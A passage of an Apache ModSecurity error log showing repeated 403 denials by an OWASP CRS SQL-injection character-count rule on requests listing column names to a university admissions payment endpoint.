"ZO1VrcCo-f0AAPbOKW0AAAAG"]
[Tue Aug 29 09:19:27.113916 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1Vr8Co-f0AAPbOKW4AAAAG"]
[Tue Aug 29 09:19:27.593569 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1Vr8Co-f0AAPbOKW8AAAAG"]
[Tue Aug 29 09:19:27.752246 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1Vr8Co-f0AAPbOKXAAAAAG"]
[Tue Aug 29 09:19:30.035810 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VssCo-f0AAPbOKXEAAAAG"]
[Tue Aug 29 09:19:31.257084 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1Vs8Co-f0AAPbOKXIAAAAG"]
[Tue Aug 29 09:19:32.061592 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VtMCo-f0AAPbOKXMAAAAG"]
[Tue Aug 29 09:19:32.486173 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VtMCo-f0AAPbOKXQAAAAG"]
[Tue Aug 29 09:19:33.039337 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VtcCo-f0AAPbOKXUAAAAG"]
[Tue Aug 29 09:19:33.215373 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VtcCo-f0AAPbOKXYAAAAG"]
[Tue Aug 29 09:19:36.804576 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VuMCo-f0AAPbOKXcAAAAG"]
[Tue Aug 29 09:19:37.703804 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VucCo-f0AAPbOKXgAAAAG"]
[Tue Aug 29 09:19:38.192904 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VusCo-f0AAPbOKXkAAAAG"]
[Tue Aug 29 09:19:38.365307 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VusCo-f0AAPbOKXoAAAAG"]
[Tue Aug 29 09:19:38.535584 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VusCo-f0AAPbOKXsAAAAG"]
[Tue Aug 29 09:19:38.696012 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VusCo-f0AAPbOKXwAAAAG"]
[Tue Aug 29 09:19:38.831701 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VusCo-f0AAPbOKX0AAAAG"]
[Tue Aug 29 09:19:42.357052 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VvsCo-f0AAPbOKYAAAAAG"]
[Tue Aug 29 09:19:42.535193 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VvsCo-f0AAPbOKYEAAAAG"]
[Tue Aug 29 09:19:42.712870 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VvsCo-f0AAPbOKYIAAAAG"]
[Tue Aug 29 09:19:45.296420 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: 